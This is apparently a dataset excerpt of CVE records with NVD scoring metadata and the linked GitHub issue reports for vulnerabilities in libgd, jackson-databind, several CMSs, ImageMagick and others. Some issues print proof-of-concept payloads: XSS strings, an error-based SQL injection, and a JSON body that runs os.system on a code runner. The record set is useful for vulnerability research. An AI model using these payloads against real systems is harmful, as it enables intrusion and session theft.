1
2019-05-28T15:06:21Z
2019-06-11T20:01:16Z
https://github.com/dotCMS/core/issues/16624
449,324,640
16,624
426
CVE-2019-11038
2019-06-19T00:15:12.360
When using the gdImageCreateFromXbm() function in the GD Graphics Library (aka LibGD) 2.2.5, as used in the PHP GD extension in PHP versions 7.1.x below 7.1.30, 7.2.x below 7.2.19 and 7.3.x below 7.3.6, it is possible to supply data that will cause the function to use the value of uninitialized variable. This may lead ...
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", ...
[ { "source": "security@php.net", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00020.html" }, { "source": "security@php.net", "tags": [ "Third Party Advisory" ], "url": "https://access....
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libgd:libgd:2.2.5:*:*:*:*:*:*:*", "matchCriteriaId": "C257CC1C-BF6A-4125-AA61-9C2D09096084", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding"...
[ "908" ]
908
https://github.com/libgd/libgd/issues/501
[ "Exploit", "Third Party Advisory" ]
github.com
[ "libgd", "libgd" ]
There is a GD related issue fixed in PHP (7.1.30, 7.2.19 and 7.3.6) which was assigned CVE-2019-11038 and is in the PHP bug https://bugs.php.net/bug.php?id=77973 . Filling the issue for the correlated issue in the libgd library itself.
Uninitialized read in gdImageCreateFromXbm (CVE-2019-11038)
https://api.github.com/repos/libgd/libgd/issues/501/comments
3
2019-05-31T20:28:02Z
2019-09-02T08:30:00Z
https://github.com/libgd/libgd/issues/501
450,968,797
501
427
CVE-2019-12814
2019-06-19T14:15:10.897
A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.x through 2.9.9. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint and the service has JDOM 1.x or 2.x jar in the classpath, an attacker can send a specifically crafted JSON messag...
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "PARTIAL...
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2019:2858" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2019:2935" }, { "source"...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*", "matchCriteriaId": "7036DA13-110D-40B3-8494-E361BBF4AFCD", "versionEndExcluding": "2.6.7.3", "versionEndIncluding": null, "versio...
[ "502" ]
502
https://github.com/FasterXML/jackson-databind/issues/2341
[ "Third Party Advisory" ]
github.com
[ "FasterXML", "jackson-databind" ]
Similar to other polymorphic types with no limits, but for XXE with `jdom2.jar`, tracked as `CVE-2019-12814`. See https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062 for description of the general problem. Fixed in: * 2.9.10 * 2.8.11.4 * 2.7.9.6 * 2.6.7.3
Block yet another gadget type (jdom, CVE-2019-12814)
https://api.github.com/repos/FasterXML/jackson-databind/issues/2341/comments
35
2019-06-04T04:08:07Z
2019-10-16T04:53:30Z
https://github.com/FasterXML/jackson-databind/issues/2341
451,788,559
2,341
428
CVE-2018-17423
2019-06-19T17:15:10.827
An issue was discovered in e107 v2.1.9. There is a XSS attack on e107_admin/comment.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Kiss-sh0t/e107_v2.1.9_XSS_poc" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/e107inc/e107/issues/3414" }, ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:e107:e107:2.1.9:*:*:*:*:*:*:*", "matchCriteriaId": "B2D5032E-949D-493D-97D9-51ED1A990D98", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": ...
[ "79" ]
79
https://github.com/e107inc/e107/issues/3414
[ "Third Party Advisory" ]
github.com
[ "e107inc", "e107" ]
(removed)
(removed)
https://api.github.com/repos/e107inc/e107/issues/3414/comments
4
2018-09-03T02:35:20Z
2021-09-06T18:40:34Z
https://github.com/e107inc/e107/issues/3414
356,340,540
3,414
429
CVE-2018-17079
2019-06-19T18:15:10.963
An issue was discovered in ZRLOG 2.0.1. There is a Stored XSS vulnerability in the nickname field of the comment area.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/94fzb/zrlog/issues/38" }, { "source": "cve@mitre.org", "tags": null, "url": "https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29" },...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:zrlog:zrlog:2.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "CDB89DE9-6695-48D7-9A0B-0207EAAAAD9C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding"...
[ "79" ]
79
https://github.com/94fzb/zrlog/issues/38
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "94fzb", "zrlog" ]
Comment area does not do input filtering Poc `</p><img%20src=1%20onerror=alert(1)><p>`
There is a stored XSS in the article review area
https://api.github.com/repos/94fzb/zrlog/issues/38/comments
10
2018-09-18T15:55:09Z
2019-10-24T13:20:28Z
https://github.com/94fzb/zrlog/issues/38
361,373,310
38
430
CVE-2018-16250
2019-06-20T14:15:10.687
The "utilisateur" menu in Creatiwity wityCMS 0.6.2 modifies the presence of XSS at two input points for user information, with the "first name" and "last name" parameters.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Creatiwity/wityCMS/issues/156" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:creatiwity:witycms:0.6.2:*:*:*:*:*:*:*", "matchCriteriaId": "F3E492B9-5B53-4042-8557-CA20E088491C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExc...
[ "79" ]
79
https://github.com/Creatiwity/wityCMS/issues/156
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "Creatiwity", "wityCMS" ]
The "utilisateur" menu on the WityCMS 0.6.2 site modifies the presence of XSS at two input points for user information, with the parameters "first name" and "last name". payload: " onclick="alert(document.cookie)" " onclick="alert(document.cookie)" Javascript gets executed. Here's an output of the mentioned paylo...
Persistent XSS
https://api.github.com/repos/Creatiwity/wityCMS/issues/156/comments
0
2018-08-29T08:41:37Z
2018-08-29T08:41:37Z
https://github.com/Creatiwity/wityCMS/issues/156
355,056,617
156
431
CVE-2018-16251
2019-06-20T14:15:10.750
A "search for user discovery" injection issue exists in Creatiwity wityCMS 0.6.2 via the "Utilisateur" menu. No input parameters are filtered, e.g., the /admin/user/users Nickname, email, firstname, lastname, and groupe parameters.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4, "confidentialityImpact": "PARTIAL", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Creatiwity/wityCMS/issues/157" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:creatiwity:witycms:0.6.2:*:*:*:*:*:*:*", "matchCriteriaId": "F3E492B9-5B53-4042-8557-CA20E088491C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExc...
[ "89" ]
89
https://github.com/Creatiwity/wityCMS/issues/157
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "Creatiwity", "wityCMS" ]
Search for user discovery injection under the witycms 0.6.2 "Utilisateur" menu. No input parameters were filtered. /admin/user/users? Nickname=1&amp;email=&amp;firstname=&amp;lastname=&amp;groupe= payload: firstname=' AND (SELECT 6463 FROM(SELECT COUNT(*),CONCAT(0x717a717671,(SELECT (ELT(6463=6463,1))),0x717a707071,F...
Find a SQL injection
https://api.github.com/repos/Creatiwity/wityCMS/issues/157/comments
3
2018-08-29T09:47:35Z
2018-11-18T06:12:32Z
https://github.com/Creatiwity/wityCMS/issues/157
355,081,811
157
432
CVE-2018-16247
2019-06-20T16:15:11.087
YzmCMS 5.1 has XSS via the admin/system_manage/user_config_add.html title parameter.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/yzmcms/yzmcms/issues/3" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:yzmcms:yzmcms:5.1:*:*:*:*:*:*:*", "matchCriteriaId": "0A656260-E114-4D4D-A5E7-E56F6B97245C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding"...
[ "79" ]
79
https://github.com/yzmcms/yzmcms/issues/3
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "yzmcms", "yzmcms" ]
http://127.0.0.1/yzmcms/admin/system_manage/user_config_add.html XSS, payload :<script>alert(1);</script> POC: POST /yzmcms/admin/system_manage/user_config_add.html HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0 Accept: application/json, text...
yzmcms v5.1 XSS
https://api.github.com/repos/yzmcms/yzmcms/issues/3/comments
1
2018-08-16T05:18:39Z
2020-01-02T07:59:45Z
https://github.com/yzmcms/yzmcms/issues/3
351,058,717
3
433
CVE-2018-15890
2019-06-20T17:15:09.800
An issue was discovered in EthereumJ 1.8.2. There is Unsafe Deserialization in ois.readObject in mine/Ethash.java and decoder.readObject in crypto/ECKey.java. When a node syncs and mines a new block, arbitrary OS commands can be run on the server.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 10, "confidentialityImpact": "COMPLETE"...
[ { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://github.com/ethereum/ethereumj" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/ethereum/ethereumj/issues/1161" ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:ethereum:ethereumj:1.8.2:*:*:*:*:*:*:*", "matchCriteriaId": "BABD94AC-7FC3-45D9-8189-997AC3AC011E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExc...
[ "502" ]
502
https://github.com/ethereum/ethereumj/issues/1161
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "ethereum", "ethereumj" ]
### What's wrong Ethash class uses pure Java object serialization to store light and full datasets. As @ThingToNO pointed out, this serialization in its pure form can be exploited, additional information can be found [here](https://github.com/frohoff/ysoserial/). However, in this particular case it doesn't look valu...
Unsafe Java object serialization
https://api.github.com/repos/ethereum/ethereumj/issues/1161/comments
4
2018-08-20T14:48:16Z
2019-07-18T15:27:18Z
https://github.com/ethereum/ethereumj/issues/1161
352,169,268
1,161
434
CVE-2018-15747
2019-06-21T14:15:10.693
The default configuration of glot-www through 2018-05-19 allows remote attackers to execute arbitrary code because glot-code-runner supports os.system within a "python" "files" "content" JSON file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL",...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/prasmussen/glot-code-runner/issues/15" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "http...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:glot:glot-www:*:*:*:*:*:*:*:*", "matchCriteriaId": "17442B64-AF4C-4E2F-B502-DDE0ADF2B3AB", "versionEndExcluding": null, "versionEndIncluding": "2018-05-19", "versionStartExcl...
[ "20" ]
20
https://github.com/prasmussen/glot-code-runner/issues/15
[ "Exploit", "Third Party Advisory" ]
github.com
[ "prasmussen", "glot-code-runner" ]
This program doesn't limit the execution of command, we can run arbitrarily command on this runner. payload: ``` { "language": "python", "files": [ { "name": "main.py", "content": "import os\nos.system('touch /tmp/pwned')" } ] } ``` output: ``` # ./runner { "language": "py...
Arbitrarily code execute
https://api.github.com/repos/prasmussen/glot-code-runner/issues/15/comments
1
2018-08-23T09:11:20Z
2018-08-25T15:49:59Z
https://github.com/prasmussen/glot-code-runner/issues/15
353,292,017
15
435
CVE-2018-20843
2019-06-24T17:15:09.980
In libexpat in Expat before 2.2.7, XML input including XML names that contain a large number of colons could make the XML parser consume a high amount of RAM and CPU resources while processing (enough to be usable for denial-of-service attacks).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00039.html" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url"...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libexpat_project:libexpat:*:*:*:*:*:*:*:*", "matchCriteriaId": "64559605-B284-4E8F-BE76-A52DDC1B26FE", "versionEndExcluding": "2.2.7", "versionEndIncluding": null, "versionSt...
[ "611" ]
611
https://github.com/libexpat/libexpat/issues/186
[ "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "libexpat", "libexpat" ]
valgrind --tool=massif xmlwf clusterfuzz-testcase-4543406568112128.txt reports that xmlwf uses > 2G of memory to load this bogus xml document. [clusterfuzz-testcase-4543406568112128.txt](https://github.com/libexpat/libexpat/files/1664546/clusterfuzz-testcase-4543406568112128.txt) This was reported by oss-fuzz ag...
[CVE-2018-20843] 88k xml file uses >2G memory
https://api.github.com/repos/libexpat/libexpat/issues/186/comments
7
2018-01-25T15:38:40Z
2019-06-24T18:21:36Z
https://github.com/libexpat/libexpat/issues/186
291,613,149
186
436
CVE-2019-12966
2019-06-26T12:15:08.727
FeHelper through 2019-06-19 allows arbitrary code execution during a JSON format operation, as demonstrated by the {"a":(function(){confirm(1)})()} input.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL",...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/zxlie/FeHelper/issues/63" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Part...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:fehelper_project:fehelper:*:*:*:*:*:*:*:*", "matchCriteriaId": "1F9F51EC-B8B3-4388-8D31-DC0283E11624", "versionEndExcluding": null, "versionEndIncluding": "2019-06-19", "vers...
[ "74" ]
74
https://github.com/zxlie/FeHelper/issues/63
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "zxlie", "FeHelper" ]
poc: ``` (function(){confirm(1)})() ``` ![image](https://user-images.githubusercontent.com/9510938/60148939-8713f000-9805-11e9-8e3a-0acc74220117.png) ![image](https://user-images.githubusercontent.com/9510938/60148967-aa3e9f80-9805-11e9-8132-0e34655a6dd3.png) when the web with single js content, it may r...
arbitrary code execution when formating json
https://api.github.com/repos/zxlie/FeHelper/issues/63/comments
5
2019-06-26T03:36:43Z
2021-01-03T08:14:11Z
https://github.com/zxlie/FeHelper/issues/63
460,743,213
63
437
CVE-2018-20847
2019-06-26T18:15:10.057
An improper computation of p_tx0, p_tx1, p_ty0 and p_ty1 in the function opj_get_encoding_parameters in openjp2/pi.c in OpenJPEG through 2.3.0 can lead to an integer overflow.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PART...
[ { "source": "cve@mitre.org", "tags": [ "Broken Link", "Third Party Advisory", "VDB Entry" ], "url": "http://www.securityfocus.com/bid/108921" }, { "source": "cve@mitre.org", "tags": [ "Patch" ], "url": "https://github.com/uclouvain/openjpeg/commit/5d00b719...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:uclouvain:openjpeg:*:*:*:*:*:*:*:*", "matchCriteriaId": "2661F1B4-0FA3-4A71-96EC-505B1CD361D4", "versionEndExcluding": null, "versionEndIncluding": "2.3.0", "versionStartExcl...
[ "190" ]
190
https://github.com/uclouvain/openjpeg/issues/431
[ "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "uclouvain", "openjpeg" ]
Originally reported on Google Code with ID 431 ``` https://code.google.com/p/chromium/issues/detail?id=431288 Reproduced on trunk r2924 using MacOS x86 ASan build : ASAN_OPTIONS="allocator_may_return_null=1" ./bin/opj_decompress -i ../../ex/0.jp2 -o 0.bmp [INFO] Start to read j2k main header (119). [INFO] Main heade...
Heap-buffer-overflow in opj_tcd_init_decode_tile
https://api.github.com/repos/uclouvain/openjpeg/issues/431/comments
11
2014-11-14T19:45:14Z
2022-09-20T15:12:50Z
https://github.com/uclouvain/openjpeg/issues/431
87,401,059
431
438
CVE-2019-12974
2019-06-26T18:15:10.167
A NULL pointer dereference in the function ReadPANGOImage in coders/pango.c and the function ReadVIDImage in coders/vid.c in ImageMagick 7.0.8-34 allows remote attackers to cause a denial of service via a crafted image.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE...
[ { "source": "cve@mitre.org", "tags": null, "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html" }, { "source": "cve@mitre.org", "tags": null, "url": "http://www.securityfocus.com/bid/108913" }, { "source": "cve@mitre.org", "tags": [ "Patch...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-34:*:*:*:*:*:*:*", "matchCriteriaId": "F10870C6-6679-45A8-8F7F-8C3C295A4E29", "versionEndExcluding": null, "versionEndIncluding": null, "version...
[ "476" ]
476
https://github.com/ImageMagick/ImageMagick/issues/1515
[ "Patch", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### Prerequisites - [ Y ] I have written a descriptive issue title - [ Y ] I have verified that I am using the latest version of ImageMagick - [ Y ] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) iss...
Null pointer deference in function ReadPANGOImage in coders/pango.c
https://api.github.com/repos/ImageMagick/ImageMagick/issues/1515/comments
3
2019-03-21T03:25:02Z
2019-06-27T01:28:59Z
https://github.com/ImageMagick/ImageMagick/issues/1515
423,558,712
1,515
439
CVE-2019-12975
2019-06-26T18:15:10.213
ImageMagick 7.0.8-34 has a memory leak vulnerability in the WriteDPXImage function in coders/dpx.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE...
[ { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html" }, { "source": "cve@mitre.org", "tags": [ "Broken Link", "Third Party Advisory", "VDB Entry" ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-34:*:*:*:*:*:*:*", "matchCriteriaId": "F10870C6-6679-45A8-8F7F-8C3C295A4E29", "versionEndExcluding": null, "versionEndIncluding": null, "version...
[ "401" ]
401
https://github.com/ImageMagick/ImageMagick/issues/1517
[ "Patch", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### Prerequisites - [ Y ] I have written a descriptive issue title - [ Y ] I have verified that I am using the latest version of ImageMagick - [ Y ] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) is...
Possible but rare memory leak in function WriteDPXImage
https://api.github.com/repos/ImageMagick/ImageMagick/issues/1517/comments
2
2019-03-21T06:25:46Z
2019-06-27T01:29:21Z
https://github.com/ImageMagick/ImageMagick/issues/1517
423,586,613
1,517
440
CVE-2019-12976
2019-06-26T18:15:10.277
ImageMagick 7.0.8-34 has a memory leak in the ReadPCLImage function in coders/pcl.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE...
[ { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html" }, { "source": "cve@mitre.org", "tags": [ "Broken Link", "Third Party Advisory", "VDB Entry" ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-34:*:*:*:*:*:*:*", "matchCriteriaId": "F10870C6-6679-45A8-8F7F-8C3C295A4E29", "versionEndExcluding": null, "versionEndIncluding": null, "version...
[ "401" ]
401
https://github.com/ImageMagick/ImageMagick/issues/1520
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### Prerequisites - [ Y ] I have written a descriptive issue title - [ Y ] I have verified that I am using the latest version of ImageMagick - [ Y ] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) iss...
Memory leak in function ReadPCLImage
https://api.github.com/repos/ImageMagick/ImageMagick/issues/1520/comments
2
2019-03-21T07:25:10Z
2019-06-27T01:29:46Z
https://github.com/ImageMagick/ImageMagick/issues/1520
423,598,777
1,520
441
CVE-2019-12977
2019-06-26T18:15:10.323
ImageMagick 7.0.8-34 has a "use of uninitialized value" vulnerability in the WriteJP2Image function in coders/jp2.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PART...
[ { "source": "cve@mitre.org", "tags": null, "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html" }, { "source": "cve@mitre.org", "tags": null, "url": "http://www.securityfocus.com/bid/108913" }, { "source": "cve@mitre.org", "tags": [ "Patch...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-34:*:*:*:*:*:*:*", "matchCriteriaId": "F10870C6-6679-45A8-8F7F-8C3C295A4E29", "versionEndExcluding": null, "versionEndIncluding": null, "version...
[ "665" ]
665
https://github.com/ImageMagick/ImageMagick/issues/1518
[ "Patch", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### Prerequisites - [ Y ] I have written a descriptive issue title - [ Y ] I have verified that I am using the latest version of ImageMagick - [ Y ] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) iss...
Use-of-uninitialized-value in function WriteJP2Image
https://api.github.com/repos/ImageMagick/ImageMagick/issues/1518/comments
4
2019-03-21T06:44:34Z
2019-06-27T01:30:10Z
https://github.com/ImageMagick/ImageMagick/issues/1518
423,590,022
1,518
442
CVE-2019-12978
2019-06-26T18:15:10.370
ImageMagick 7.0.8-34 has a "use of uninitialized value" vulnerability in the ReadPANGOImage function in coders/pango.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PART...
[ { "source": "cve@mitre.org", "tags": null, "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html" }, { "source": "cve@mitre.org", "tags": null, "url": "http://www.securityfocus.com/bid/108913" }, { "source": "cve@mitre.org", "tags": [ "Patch...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-34:*:*:*:*:*:*:*", "matchCriteriaId": "F10870C6-6679-45A8-8F7F-8C3C295A4E29", "versionEndExcluding": null, "versionEndIncluding": null, "version...
[ "665" ]
665
https://github.com/ImageMagick/ImageMagick/issues/1519
[ "Patch", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### Prerequisites - [ Y ] I have written a descriptive issue title - [ Y ] I have verified that I am using the latest version of ImageMagick - [ Y ] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) iss...
Use-of-uninitialized-value in function ReadPANGOImage
https://api.github.com/repos/ImageMagick/ImageMagick/issues/1519/comments
2
2019-03-21T06:54:58Z
2019-06-27T01:30:41Z
https://github.com/ImageMagick/ImageMagick/issues/1519
423,592,141
1,519
443
CVE-2019-12979
2019-06-26T18:15:10.417
ImageMagick 7.0.8-34 has a "use of uninitialized value" vulnerability in the SyncImageSettings function in MagickCore/image.c. This is related to AcquireImage in magick/image.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PART...
[ { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "ht...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-34:*:*:*:*:*:*:*", "matchCriteriaId": "F10870C6-6679-45A8-8F7F-8C3C295A4E29", "versionEndExcluding": null, "versionEndIncluding": null, "version...
[ "665" ]
665
https://github.com/ImageMagick/ImageMagick/issues/1522
[ "Patch", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### Prerequisites - [ Y ] I have written a descriptive issue title - [ Y ] I have verified that I am using the latest version of ImageMagick - [ Y ] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) iss...
Use-of-uninitialized-value in function SyncImageSettings.
https://api.github.com/repos/ImageMagick/ImageMagick/issues/1522/comments
5
2019-03-21T11:58:29Z
2019-08-10T06:30:27Z
https://github.com/ImageMagick/ImageMagick/issues/1522
423,694,012
1,522
444
CVE-2019-12995
2019-06-28T10:15:11.487
Istio before 1.2.2 mishandles certain access tokens, leading to "Epoch 0 terminated with an error" in Envoy. This is related to a jwt_authenticator.cc segmentation fault.
